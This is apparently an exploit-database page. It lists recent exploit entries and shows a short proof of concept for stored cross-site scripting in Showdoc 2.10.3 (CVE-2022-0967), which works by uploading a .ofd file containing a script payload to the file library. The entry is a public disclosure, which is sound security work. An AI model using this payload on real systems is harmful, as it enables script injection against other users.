
6 changes to exploits/shellcodes SDT-CW3B1 1.1.0 - OS Command Injection SolarView Compact 6.0 - OS Command Injection Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS) T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS) T-Soft E-Commerce 4 - SQLi (Authenticated) Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
21 lines
No EOL
725 B
Text
21 lines
No EOL
725 B
Text
# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
|
|
# Exploit Author: Akshay Ravi
|
|
# Vendor Homepage: https://github.com/star7th/showdoc
|
|
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
|
|
# Version: <= 2.10.3
|
|
# Tested on: macOS Monterey
|
|
# CVE : CVE-2022-0967
|
|
|
|
Description: Stored XSS via uploading file in .ofd format
|
|
|
|
1. Create a file with .ofd extension and add XSS Payload inside the file
|
|
|
|
filename = "payload.ofd"
|
|
payload = "<script>alert(1)</script>"
|
|
|
|
2. Login to showdoc v2.10.2 and go to file library
|
|
|
|
Endpoint = "https://www.site.com/attachment/index"
|
|
|
|
3. Upload the payload on file library and click on the check button
|
|
4. The XSS payload will executed once we visited the URL |